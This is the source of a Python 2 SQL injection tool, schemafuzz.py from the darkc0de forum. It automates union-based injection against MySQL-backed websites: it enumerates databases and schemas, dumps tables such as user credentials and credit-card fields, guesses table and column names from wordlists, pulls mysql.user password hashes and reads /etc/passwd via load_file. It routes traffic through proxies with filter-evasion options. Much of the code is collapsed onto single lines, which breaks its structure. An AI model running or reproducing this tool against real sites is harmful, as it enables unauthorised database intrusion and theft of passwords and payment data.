#!/usr/bin/python
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# MySQL Injection Schema, Dataext, and fuzzer
# Share the c0de!
# Darkc0de Team
# www.darkc0de.com
# rsauron[at]gmail[dot]com
# Greetz to
# d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx,
# and the darkc0de crew
# NOTES:
# Proxy function may be a little buggy if your using public proxies... Test your proxy prior to using it with this script..
# The script does do a little proxy test.. it does a GET to google.com if data comes back its good... no data = failed and the proxy
# will not be used. This is a effort to keep the script from getting stuck in a endless loop.
# Any other questions Hit the forums and ask questions. google is your friend!
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# Intended for authorized Web Application Pen Testing!
# BE WARNED, THIS TOOL IS VERY LOUD..
#Set default evasion options here
arg_end = "--"
arg_eva = "+"
#colMax variable for column Finder
colMax = 205
#Fill in the tables you want tested here.
fuzz_tables = ['tbladmins', 'sort', '_wfspro_admin', '4images_users', 'a_admin', 'account', 'accounts', 'adm', 'admin', 'admin_login', 'admin_user', 'admin_userinfo', 'administer', 'administrable', 'administrate', 'administration', 'administrator', 'administrators', 'adminrights', 'admins', 'adminuser', 'art', 'article_admin', 'articles', 'artikel', '\xc3\x83\xc3\x9c\xc3\x82\xc3\xab', 'aut', 'author', 'autore', 'backend', 'backend_users', 'backenduser', 'bbs', 'book', 'chat_config', 'chat_messages', 'chat_users', 'client', 'clients', 'clubconfig', 'company', 'config', 'contact', 'contacts', 'content', 'control', 'cpg_config', 'cpg132_users', 'customer', 'customers', 'customers_basket', 'dbadmins', 'dealer', 'dealers', 'diary', 'download', 'Dragon_users', 'e107.e107_user', 'e107_user', 'forum.ibf_members', 'fusion_user_groups', 'fusion_users', 'group', 'groups', 'ibf_admin_sessions', 'ibf_conf_settings', 'ibf_members', 'ibf_members_converge', 'ibf_sessions', 'icq', 'images', 'index', 'info', 'ipb.ibf_members', 'ipb_sessions', 'joomla_users', 'jos_blastchatc_users', 'jos_comprofiler_members', 'jos_contact_details', 'jos_joomblog_users', 'jos_messages_cfg', 'jos_moschat_users', 'jos_users', 'knews_lostpass', 'korisnici', 'kpro_adminlogs', 'kpro_user', 'links', 'login', 'login_admin', 'login_admins', 'login_user', 'login_users', 'logins', 'logon', 'logs', 'lost_pass', 'lost_passwords', 'lostpass', 'lostpasswords', 'm_admin', 'main', 'mambo_session', 'mambo_users', 'manage', 'manager', 'mb_users', 'member', 'memberlist', 'members', 'minibbtable_users', 'mitglieder', 'movie', 'movies', 'mybb_users', 'mysql', 'mysql.user', 'name', 'names', 'news', 'news_lostpass', 'newsletter', 'nuke_authors', 'nuke_bbconfig', 'nuke_config', 'nuke_popsettings', 'nuke_users', '\xc3\x93\xc3\x83\xc2\xbb\xc2\xa7', 'obb_profiles', 'order', 'orders', 'parol', 'partner', 'partners', 'passes', 'password', 'passwords', 'perdorues', 'perdoruesit', 'phorum_session', 'phorum_user', 'phorum_users', 'phpads_clients', 'phpads_config', 'phpbb_users', 'phpBB2.forum_users', 'phpBB2.phpbb_users', 'phpmyadmin.pma_table_info', 'pma_table_info', 'poll_user', 'punbb_users', 'pwd', 'pwds', 'reg_user', 'reg_users', 'registered', 'reguser', 'regusers', 'session', 'sessions', 'settings', 'shop.cards', 'shop.orders', 'site_login', 'site_logins', 'sitelogin', 'sitelogins', 'sites', 'smallnuke_members', 'smf_members', 'SS_orders', 'statistics', 'superuser', 'sysadmin', 'sysadmins', 'system', 'sysuser', 'sysusers', 'table', 'tables', 'tb_admin', 'tb_administrator', 'tb_login', 'tb_member', 'tb_members', 'tb_user', 'tb_username', 'tb_usernames', 'tb_users', 'tbl', 'tbl_user', 'tbl_users', 'tbluser', 'tbl_clients', 'tbl_client', 'tblclients', 'tblclient', 'test', 'usebb_members', 'user', 'user_admin', 'user_info', 'user_list', 'user_login', 'user_logins', 'user_names', 'usercontrol', 'userinfo', 'userlist', 'userlogins', 'username', 'usernames', 'userrights', 'users', 'vb_user', 'vbulletin_session', 'vbulletin_user', 'voodoo_members', 'webadmin', 'webadmins', 'webmaster', 'webmasters', 'webuser', 'webusers', 'x_admin', 'xar_roles', 'xoops_bannerclient', 'xoops_users', 'yabb_settings', 'yabbse_settings', 'ACT_INFO', 'ActiveDataFeed', 'Category', 'CategoryGroup', 'ChicksPass', 'ClickTrack', 'Country', 'CountryCodes1', 'CustomNav', 'DataFeedPerformance1', 'DataFeedPerformance2', 'DataFeedPerformance2_incoming', 'DataFeedShowtag1', 'DataFeedShowtag2', 'DataFeedShowtag2_incoming', 'dtproperties', 'Event', 'Event_backup', 'Event_Category', 'EventRedirect', 'Events_new', 'Genre', 'JamPass', 'MyTicketek', 'MyTicketekArchive', 'News', 'Passwords by usage count', 'PerfPassword', 'PerfPasswordAllSelected', 'Promotion', 'ProxyDataFeedPerformance', 'ProxyDataFeedShowtag', 'ProxyPriceInfo', 'Region', 'SearchOptions', 'Series', 'Sheldonshows', 'StateList', 'States', 'SubCategory', 'Subjects', 'Survey', 'SurveyAnswer', 'SurveyAnswerOpen', 'SurveyQuestion', 'SurveyRespondent', 'sysconstraints', 'syssegments', 'tblRestrictedPasswords', 'tblRestrictedShows', 'Ticket System Acc Numbers', 'TimeDiff', 'Titles', 'ToPacmail1', 'ToPacmail2', 'Total Members', 'UserPreferences', 'uvw_Category', 'uvw_Pref', 'uvw_Preferences', 'Venue', 'venues', 'VenuesNew', 'X_3945', 'stone list', 'tblArtistCategory', 'tblArtists', 'tblConfigs', 'tblLayouts', 'tblLogBookAuthor', 'tblLogBookEntry', 'tblLogBookImages', 'tblLogBookImport', 'tblLogBookUser', 'tblMails', 'tblNewCategory', 'tblNews', 'tblOrders', 'tblStoneCategory', 'tblStones', 'tblUser', 'tblWishList', 'VIEW1', 'viewLogBookEntry', 'viewStoneArtist', 'vwListAllAvailable', 'CC_info', 'CC_username', 'cms_user', 'cms_users', 'cms_admin', 'cms_admins', 'user_name', 'jos_user', 'table_user', 'email', 'mail', 'bulletin', 'cc_info', 'login_name', 'admuserinfo', 'userlistuser_list', 'SiteLogin', 'Site_Login', 'UserAdmin', 'Admins', 'Login', 'Logins']
#Fill in the columns you want tested here.
fuzz_columns = ['user', 'username', 'password', 'passwd', 'pass', 'cc_number', 'id', 'email', 'emri', 'fjalekalimi', 'pwd', 'user_name', 'customers_email_address', 'customers_password', 'user_password', 'name', 'user_pass', 'admin_user', 'admin_password', 'admin_pass', 'usern', 'user_n', 'users', 'login', 'logins', 'login_user', 'login_admin', 'login_username', 'user_username', 'user_login', 'auid', 'apwd', 'adminid', 'admin_id', 'adminuser', 'adminuserid', 'admin_userid', 'adminusername', 'admin_username', 'adminname', 'admin_name', 'usr', 'usr_n', 'usrname', 'usr_name', 'usrpass', 'usr_pass', 'usrnam', 'nc', 'uid', 'userid', 'user_id', 'myusername', 'mail', 'emni', 'logohu', 'punonjes', 'kpro_user', 'wp_users', 'emniplote', 'perdoruesi', 'perdorimi', 'punetoret', 'logini', 'llogaria', 'fjalekalimin', 'kodi', 'emer', 'ime', 'korisnik', 'korisnici', 'user1', 'administrator', 'administrator_name', 'mem_login', 'login_password', 'login_pass', 'login_passwd', 'login_pwd', 'sifra', 'lozinka', 'psw', 'pass1word', 'pass_word', 'passw', 'pass_w', 'user_passwd', 'userpass', 'userpassword', 'userpwd', 'user_pwd', 'useradmin', 'user_admin', 'mypassword', 'passwrd', 'admin_pwd', 'admin_passwd', 'mem_password', 'memlogin', 'e_mail', 'usrn', 'u_name', 'uname', 'mempassword', 'mem_pass', 'mem_passwd', 'mem_pwd', 'p_word', 'pword', 'p_assword', 'myname', 'my_username', 'my_name', 'my_password', 'my_email', 'cvvnumber ', 'about', 'access', 'accnt', 'accnts', 'account', 'accounts', 'admin', 'adminemail', 'adminlogin', 'adminmail', 'admins', 'aid', 'aim', 'auth', 'authenticate', 'authentication', 'blog', 'cc_expires', 'cc_owner', 'cc_type', 'cfg', 'cid', 'clientname', 'clientpassword', 'clientusername', 'conf', 'config', 'contact', 'converge_pass_hash', 'converge_pass_salt', 'crack', 'customer', 'customers', 'cvvnumber]', 'data', 'db_database_name', 'db_hostname', 'db_password', 'db_username', 'download', 'e-mail', 'emailaddress', 'full', 'gid', 'group', 'group_name', 'hash', 'hashsalt', 'homepage', 'icq', 'icq_number', 'id_group', 'id_member', 'images', 'index', 'ip_address', 'last_ip', 'last_login', 'lastname', 'log', 'login_name', 'login_pw', 'loginkey', 'loginout', 'logo', 'md5hash', 'member', 'member_id', 'member_login_key', 'member_name', 'memberid', 'membername', 'members', 'new', 'news', 'nick', 'number', 'nummer', 'pass_hash', 'passwordsalt', 'passwort', 'personal_key', 'phone', 'privacy', 'pw', 'pwrd', 'salt', 'search', 'secretanswer', 'secretquestion', 'serial', 'session_member_id', 'session_member_login_key', 'sesskey', 'setting', 'sid', 'spacer', 'status', 'store', 'store1', 'store2', 'store3', 'store4', 'table_prefix', 'temp_pass', 'temp_password', 'temppass', 'temppasword', 'text', 'un', 'user_email', 'user_icq', 'user_ip', 'user_level', 'user_passw', 'user_pw', 'user_pword', 'user_pwrd', 'user_un', 'user_uname', 'user_usernm', 'user_usernun', 'user_usrnm', 'userip', 'userlogin', 'usernm', 'userpw', 'usr2', 'usrnm', 'usrs', 'warez', 'xar_name', 'xar_pass']
import urllib, sys, re, os, socket, httplib, urllib2, time, random
#determine platform
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
SysCls = 'cls'
else:
SysCls = 'unknown'
#say hello
os.system(SysCls)
if len(sys.argv) <= 1: print "\n|---------------------------------------------------------------|" print "| rsauron[@]gmail[dot]com v5.0 |" print "| 6/2008 schemafuzz.py |" print "| -MySQL v5+ Information_schema Database Enumeration |" print "| -MySQL v4+ Data Extractor |" print "| -MySQL v4+ Table & Column Fuzzer |" print "| Usage: schemafuzz.py [options] |" print "| -h help darkc0de.com |" print "|---------------------------------------------------------------|\n" sys.exit(1) #help option for arg in sys.argv: if arg == "-h": print " Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot]com darkc0de.com" print "\tModes:" print "\tDefine: --dbs Shows all databases user has access too. MySQL v5+" print "\tDefine: --schema Enumerate Information_schema Database. MySQL v5+" print "\tDefine: --full Enumerates all databases information_schema table MySQL v5+" print "\tDefine: --dump Extract information from a Database, Table and Column. MySQL v4+" print "\tDefine: --fuzz Fuzz Tables and Columns. MySQL v4+" print "\tDefine: --findcol Finds Columns length of a SQLi MySQL v4+" print "\tDefine: --info Gets MySQL server configuration only. MySQL v4+" print "\n\tRequired:" print "\tDefine: -u URL \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\"" print "\n\tMode dump and schema options:" print "\tDefine: -D \"database_name\"" print "\tDefine: -T \"table_name\"" print "\tDefine: -C \"column_name,column_name...\"" print "\n\tOptional:" print "\tDefine: -p \"127.0.0.1:80 or proxy.txt\"" print "\tDefine: -o \"ouput_file_name.txt\" Default is schemafuzzlog.txt" print "\tDefine: -r row number to start at" print "\tDefine: -v Verbosity off option. Will not display row #'s in dump mode." print "\n Ex: ./schemafuzz.py --info -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\"" print " Ex: ./schemafuzz.py --dbs -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\"" print " Ex: ./schemafuzz.py --schema -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -D catalog -T orders -r 200" print " Ex: ./schemafuzz.py --dump -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -D joomla -T jos_users -C username,password" print " Ex: ./schemafuzz.py --fuzz -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -end \"/*\" -o sitelog.txt" print " Ex: ./schemafuzz.py --findcol -u \"www.site.com/news.php?id=22\"" sys.exit(1) #define varablies site = "" dbt = "schemafuzzlog.txt" proxy = "None" count = 0 arg_table = "None" arg_database = "None" arg_columns = "None" arg_row = "Rows" arg_verbose = 1 darkc0de = "concat(0x1e,0x1e," mode = "None" line_URL = "" count_URL = "" gets = 0 cur_db = "" cur_table = "" table_num = 0 terminal = "" num = 0 #Check args for arg in sys.argv: if arg == "-u": site = sys.argv[count+1] elif arg == "-o": dbt = sys.argv[count+1] elif arg == "-p": proxy = sys.argv[count+1] elif arg == "--dump": mode = arg arg_dump = sys.argv[count] elif arg == "--full": mode = arg elif arg == "--schema": mode = arg arg_schema = sys.argv[count] elif arg == "--dbs": mode = arg arg_dbs = sys.argv[count] elif arg == "--fuzz": mode = arg arg_fuzz = sys.argv[count] elif arg == "--info": mode = arg arg_info = sys.argv[count] elif arg == "--findcol": mode = arg arg_findcol = sys.argv[count] elif arg == "-D": arg_database = sys.argv[count+1] elif arg == "-T": arg_table = sys.argv[count+1] elif arg == "-C": arg_columns = sys.argv[count+1] elif arg == "-end": arg_end = sys.argv[count+1] if arg_end == "--": arg_eva = "+" else: arg_eva = "/**/" elif arg == "-r": num = sys.argv[count+1] table_num = num elif arg == "-v": arg_verbose = sys.argv[count] arg_verbose = 0 count+=1 #Title write file = open(dbt, "a") print "\n|---------------------------------------------------------------|" print "| rsauron[@]gmail[dot]com v5.0 |" print "| 6/2008 schemafuzz.py |" print "| -MySQL v5+ Information_schema Database Enumeration |" print "| -MySQL v4+ Data Extractor |" print "| -MySQL v4+ Table & Column Fuzzer |" print "| Usage: schemafuzz.py [options] |" print "| -h help darkc0de.com |" print "|---------------------------------------------------------------|" file.write("\n|---------------------------------------------------------------|") file.write("\n| rsauron[@]gmail[dot]com v5.0 |") file.write("\n| 6/2008 schemafuzz.py |") file.write("\n| -MySQL v5+ Information_schema Database Enumeration |") file.write("\n| -MySQL v4+ Data Extractor |") file.write("\n| -MySQL v4+ Table & Column Fuzzer |") file.write("\n| Usage: schemafuzz.py [options] |") file.write("\n| -h help darkc0de.com |") file.write("\n|---------------------------------------------------------------|") #Arg Error Checking if site == "": print "\n[-] Must include -u flag and specify a mode." print "[-] For help -h\n" sys.exit(1) if mode == "None": print "\n[-] Mode must be specified --schema, --dbs, --dump, --fuzz, --info, --full, --findcol." print "[-] For help -h\n" sys.exit(1) if mode == "--schema" and arg_database == "None": print "[-] Must include -D flag!" print "[-] For Help -h\n" sys.exit(1) if mode == "--dump": if arg_table == "None" or arg_columns == "None": print "[-] If MySQL v5+ must include -D, -T and -C flag when --dump specified!" print "[-] If MySQL v4+ must include -T and -C flag when --dump specified!" print "[-] For help -h\n" sys.exit(1) if mode != "--findcol" and site.find("darkc0de") == -1: print "\n[-] Site must contain \'darkc0de\'\n" sys.exit(1) if proxy != "None": if len(proxy.split(".")) == 2: proxy = open(proxy, "r").read() if proxy.endswith("\n"): proxy = proxy.rstrip("\n") proxy = proxy.split("\n") if arg_columns != "None": arg_columns = arg_columns.split(",") if site[:7] != "http://": site = "http://"+site if site.endswith("/*"): site = site.rstrip('/*') if site.endswith("--"): site = site.rstrip('--') #Getting the URL ready with the evasion options we selected site = site.replace("+",arg_eva) site = site.replace("/**/",arg_eva) print "\n[+] URL:",site+arg_end file.write("\n\n[+] URL:"+site+arg_end+"\n") print "[+] Evasion Used:","\""+arg_eva+"\" \""+arg_end+"\"" file.write("[+] Evasion Used: \""+str(arg_eva)+"\" \""+str(arg_end)+"\"") print "[+] %s" % time.strftime("%X") file.write("\n[+] %s" % time.strftime("%X")) #Build proxy list socket.setdefaulttimeout(20) proxy_list = [] if proxy != "None": file.write("\n[+] Building Proxy List...") print "[+] Building Proxy List..." for p in proxy: try: proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'}) opener = urllib2.build_opener(proxy_handler) gets+=1 opener.open("http://www.google.com") proxy_list.append(urllib2.build_opener(proxy_handler)) file.write("\n\tProxy:"+p+"- Success") print "\tProxy:",p,"- Success" except: file.write("\n\tProxy:"+p+"- Failed") print "\tProxy:",p,"- Failed" pass if len(proxy_list) == 0: print "[-] All proxies have failed. App Exiting" sys.exit(1) print "[+] Proxy List Complete" file.write("\n[+] Proxy List Complete") else: print "[-] Proxy Not Given" file.write("\n[+] Proxy Not Given") proxy_list.append(urllib2.build_opener()) proxy_num = 0 proxy_len = len(proxy_list) #colFinder if mode == "--findcol": print "[+] Attempting To find the number of columns..." file.write("\n[+] Attempting To find the number of columns...") print "[+] Testing: ", file.write("\n[+] Testing: ",) checkfor=[] sitenew = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva makepretty = "" for x in xrange(0,colMax): try: sys.stdout.write("%s," % (x)) file.write(str(x)+",") sys.stdout.flush() darkc0de = "dark"+str(x)+"c0de" checkfor.append(darkc0de) if x > 0:
sitenew += ","
sitenew += "0x"+darkc0de.encode("hex")
finalurl = sitenew+arg_end
gets+=1
proxy_num+=1
source = proxy_list[proxy_num % proxy_len].open(finalurl).read()
for y in checkfor:
colFound = re.findall(y,source)
if len(colFound) >= 1:
print "\n[+] Column Length is:",len(checkfor)
file.write("\n[+] Column Length is: "+str(len(checkfor)))
nullcol = re.findall(("\d+"),y)
print "[+] Found null column at column #:",nullcol[0]
file.write("\n[+] Found null column at column #: "+nullcol[0])
for z in xrange(0,len(checkfor)):
if z > 0:
makepretty += ","
makepretty += str(z)
site = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva+makepretty
print "[+] SQLi URL:",site+arg_end
file.write("\n[+] SQLi URL: "+site+arg_end)
site = site.replace(","+nullcol[0]+",",",darkc0de,")
site = site.replace(arg_eva+nullcol[0]+",",arg_eva+"darkc0de,")
site = site.replace(","+nullcol[0],",darkc0de")
print "[+] darkc0de URL:",site
file.write("\n[+] darkc0de URL: "+site)
print "[-] Done!\n"
file.write("\n[-] Done!\n")
sys.exit(1)
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
print "\n[!] Sorry Column Length could not be found."
file.write("\n[!] Sorry Column Length could not be found.")
print "[-] You might try to change colMax variable or change evasion option.. last but not least do it manually!"
print "[-] Done\n"
sys.exit(1)
#Retireve version:user:database
head_URL = site.replace("darkc0de","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end
print "[+] Gathering MySQL Server Configuration..."
file.write("\n[+] Gathering MySQL Server Configuration...\n")
while 1:
try:
gets+=1
source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
# Uncomment the following lines to debug issues with gathering server information
# print head_URL
# print source
match = re.findall("\x1e\x1e\S+",source)
if len(match) >= 1:
match = match[0][2:].split("\x1e")
version = match[0]
user = match[1]
database = match[2]
print "\tDatabase:", database
print "\tUser:", user
print "\tVersion:", version
file.write("\tDatabase: "+database+"\n")
file.write("\tUser: "+user+"\n")
file.write("\tVersion: "+version)
version = version[0]
break
else:
print "[-] No Data Found"
sys.exit(1)
except (KeyboardInterrupt, SystemExit):
raise
except:
proxy_num+=1
# Do we have Access to MySQL database and Load_File
if mode == "--info":
head_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end
gets+=1
proxy_num+=1
#print "Debug:",head_URL
source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
match = re.findall("darkc0de",source)
if len(match) >= 1:
yesno = "Yes <-- w00t w00t" else: yesno = "No" print "\n[+] Do we have Access to MySQL Database:",yesno file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno)) if yesno == "Yes <-- w00t w00t": print "[!]",site.replace("darkc0de","concat(user,0x3a,password)")+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end file.write("\n[!] "+site.replace("darkc0de","concat(user,0x3a,password)")+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end) gets+=1 proxy_num+=1 head_URL = site.replace("darkc0de","load_file(0x2f6574632f706173737764)")+arg_end #print "Debug:",head_URL source = proxy_list[proxy_num % proxy_len].open(head_URL).read() match = re.findall("root:x:",source) match = re.findall("root:*:",source) if len(match) >= 1:
yesno = "Yes <-- w00t w00t" else: yesno = "No" print "\n[+] Do we have Access to Load_File:",yesno file.write("\n\n[+] Do we have Access to Load_File: "+str(yesno)) if yesno == "Yes <-- w00t w00t": print "[!]",site.replace("darkc0de","load_file(0x2f6574632f706173737764)")+arg_end file.write("\n[!] "+site.replace("darkc0de","load_file(0x2f6574632f706173737764)")+arg_end) #lets check what we can do based on version if mode == "--schema" or mode == "--dbs" or mode == "--full": if int(version) == 4: print "\n[-] --schema, --dbs and --full can only be used on MySQL v5+ servers!" print "[-] -h for help" sys.exit(1) #Build URLS if mode == "--schema": if arg_database != "None" and arg_table == "None": print "[+] Showing Tables & Columns from database \""+arg_database+"\"" file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += arg_eva+"FROM"+arg_eva+"information_schema.columns"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(table_schema),0x1e,0x20)") count_URL += arg_eva+"FROM"+arg_eva+"information_schema.tables"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")+arg_end arg_row = "Tables" if arg_database != "None" and arg_table != "None": print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\"" file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += arg_eva+"FROM"+arg_eva+"information_schema.COLUMNS"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex") line_URL += arg_eva+"AND"+arg_eva+"table_name+=+0x"+arg_table.encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += arg_eva+"FROM"+arg_eva+"information_schema.COLUMNS"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex") count_URL += arg_eva+"AND"+arg_eva+"table_name+=+0x"+arg_table.encode("hex")+arg_end arg_row = "Columns" elif mode == "--dump": print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"" print "[+] and Column(s) "+str(arg_columns) file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"") file.write("\n[+] Column(s) "+str(arg_columns)) for column in arg_columns: darkc0de += column+",0x1e," count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += arg_eva+"FROM"+arg_eva+arg_database+"."+arg_table+arg_end line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)") line_URL += arg_eva+"FROM"+arg_eva+arg_database+"."+arg_table if int(version) == 4: count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += arg_eva+"FROM"+arg_eva+arg_table+arg_end line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)") line_URL += arg_eva+"FROM"+arg_eva+arg_table elif mode == "--full": print "[+] Starting full SQLi information_schema enumeration..." line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += arg_eva+"FROM"+arg_eva+"information_schema.columns+"+arg_eva+"WHERE"+arg_eva+"table_schema!=0x"+"information_schema".encode("hex") elif mode == "--dbs": print "[+] Showing all databases current user has access too!" file.write("\n[+] Showing all databases current user has access too!") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += arg_eva+"FROM"+arg_eva+"information_schema.schemata"+arg_eva+"WHERE"+arg_eva+"schema_name!=0x"+"information_schema".encode("hex")+arg_end line_URL = site.replace("darkc0de","concat(0x1e,0x1e,schema_name,0x1e,0x20)") line_URL += arg_eva+"FROM"+arg_eva+"information_schema.schemata"+arg_eva+"WHERE"+arg_eva+"schema_name!=0x"+"information_schema".encode("hex") arg_row = "Databases" line_URL += arg_eva+"LIMIT"+arg_eva+"NUM,1"+arg_end #Uncomment the lines below to debug issues with the line_URL or count_URL #print "URL for Counting rows in column:",count_URL #print "URL for exploit:",line_URL #Fuzz table/columns if mode == "--fuzz": print "[+] Number of tables names to be fuzzed:",len(fuzz_tables) file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_tables))) print "[+] Number of column names to be fuzzed:",len(fuzz_columns) file.write("\n[+] Number of column names to be fuzzed: "+str(len(fuzz_columns))) print "[+] Searching for tables and columns..." file.write("\n[+] Searching for tables and columns...") fuzz_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+arg_eva+"FROM"+arg_eva+"TABLE"+arg_end for table in fuzz_tables: try: proxy_num+=1 table_URL = fuzz_URL.replace("TABLE",table) gets+=1 #print "[!] Table Debug:",table_URL source = proxy_list[proxy_num % proxy_len].open(table_URL).read() e = re.findall("darkc0de", source) if len(e) > 0:
print "\n[!] Found a table called:",table
file.write("\n\n[+] Found a table called: "+str(table))
print "\n[+] Now searching for columns inside table \""+table+"\""
file.write("\n\n[+] Now searching for columns inside table \""+str(table)+"\"")
for column in fuzz_columns:
try:
proxy_num+=1
gets+=1
#print "[!] Column Debug:",table_URL.replace("0x6461726b63306465", "concat(0x6461726b63306465,0x3a,"+column+")")
source = proxy_list[proxy_num % proxy_len].open(table_URL.replace("0x6461726b63306465", "concat(0x6461726b63306465,0x3a,"+column+")")).read()
e = re.findall("darkc0de",source)
if len(e) > 0:
print "[!] Found a column called:",column
file.write("\n[!] Found a column called:"+column)
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
print "[-] Done searching inside table \""+table+"\" for columns!"
file.write("\n[-] Done searching inside table \""+str(table)+"\" for columns!")
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
#Lets Count how many rows or columns
if mode == "--schema" or mode == "--dump" or mode == "--dbs":
source = proxy_list[proxy_num % proxy_len].open(count_URL).read()
match = re.findall("\x1e\x1e\S+",source)
match = match[0][2:].split("\x1e")
row_value = match[0]
print "[+] Number of "+arg_row+": "+row_value
file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n")
if mode == "--schema" or mode == "--full" or mode == "--dbs":
print
##Schema Enumeration and DataExt loop
if mode == "--schema" or mode == "--dump" or mode == "--dbs":
while int(table_num) != int(row_value)+1:
#print "table#:",table_num,"row#:",row_value
try:
proxy_num+=1
gets+=1
#print line_URL
source = proxy_list[proxy_num % proxy_len].open(line_URL.replace("NUM",str(num))).read()
match = re.findall("\x1e\x1e\S+",source)
if len(match) >= 1:
if mode == "--schema" or mode == "--full":
match = match[0][2:].split("\x1e")
if cur_db != match[0]:
cur_db = match[0]
file.write("\n[Database]: "+match[0]+"\n")
print "[Database]: "+match[0]
print "[Table: Columns]"
file.write("[Table: Columns]")
if cur_table != match[1]:
print "\n["+str(table_num)+"]"+match[1]+": "+match[2],
file.write("\n["+str(table_num)+"]"+match[1]+": "+match[2])
cur_table = match[1]
table_num = int(table_num) + 1
else:
sys.stdout.write(",%s" % (match[2]))
file.write(","+match[2])
sys.stdout.flush()
#Gathering Databases only
elif mode == "--dbs":
match = match[0]
file.write("\n["+str(num)+"]"+str(match))
print "["+str(num)+"]",match
table_num = int(table_num) + 1
#Collect data from tables & columns
elif mode == "--dump":
match = re.findall("\x1e\x1e+[\w\d\?\/\_\:\.\=\s\S\-+]+\x1e\x1e",source)
match = match[0].strip("\x1e").split("\x1e")
if arg_verbose == 1:
print "\n["+str(num)+"] ",
file.write("\n["+str(num)+"] ",)
else:
print
file.write("\n")
for ddata in match:
if ddata == "":
ddata = "NoDataInColumn"
sys.stdout.write("%s:" % (ddata))
file.write("%s:" % ddata)
sys.stdout.flush()
table_num = int(table_num) + 1
else:
if mode == "--dump":
sys.stdout.write("\n[%s] No data" % (num))
file.write("%s:" % ddata)
table_num = int(table_num) + 1
else:
break
num = int(num) + 1
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
#Full SQLi information_schema Enumeration
if mode == "--full":
while 1:
try:
proxy_num+=1
gets+=1
source = proxy_list[proxy_num % proxy_len].open(line_URL.replace("NUM",str(num))).read()
match = re.findall("\x1e\x1e\S+",source)
if len(match) >= 1:
match = match[0][2:].split("\x1e")
if cur_db != match[0]:
cur_db = match[0]
file.write("\n\n[Database]: "+match[0]+"\n")
print "\n\n[Database]: "+match[0]
print "[Table: Columns]"
file.write("[Table: Columns]")
table_num=0
if cur_table != match[1]:
print "\n["+str(table_num)+"]"+match[1]+": "+match[2],
file.write("\n["+str(table_num)+"]"+match[1]+": "+match[2])
cur_table = match[1]
table_num = int(table_num) + 1
else:
sys.stdout.write(",%s" % (match[2]))
file.write(","+match[2])
sys.stdout.flush()
else:
if num == 0:
print "\n[-] No Data Found"
break
num = int(num) + 1
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
#Lets wrap it up!
if mode == "--schema" or mode == "--full" or mode == "--dump":
print ""
print "\n[-] %s" % time.strftime("%X")
print "[-] Total URL Requests",gets
file.write("\n\n[-] [%s]" % time.strftime("%X"))
